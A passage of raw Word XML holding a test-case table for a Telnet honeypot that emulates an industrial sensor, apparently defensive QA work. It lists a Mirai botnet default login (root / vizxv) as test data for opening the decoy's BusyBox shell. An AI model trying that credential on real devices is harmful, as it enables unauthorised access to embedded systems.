              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-TEL-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet Honeypot (Industrial Sensor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a Mirai default credential opens the BusyBox shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running; port 2323 open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">telnet host 2323</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">root / vizxv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">BusyBox banner and # prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">BusyBox v1.24.1 built-in shell banner and prompt shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-TEL-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet Honeypot (Industrial Sensor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify wrong credentials are rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">telnet host 2323; enter wrong pair</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">alice / alice123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">'Login incorrect' after a delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">'Login incorrect' displayed; auth event success=false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-TEL-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet Honeypot (Industrial Sensor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the fake file system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ls /</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ls /</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedded Linux root directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">bin dev etc home lib mnt opt proc root sbin sys tmp usr var</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-TEL-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet Honeypot (Industrial Sensor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify device control changes the shared state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">sensorctl set temp_threshold 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">sensorctl command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">OK and Redis value changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
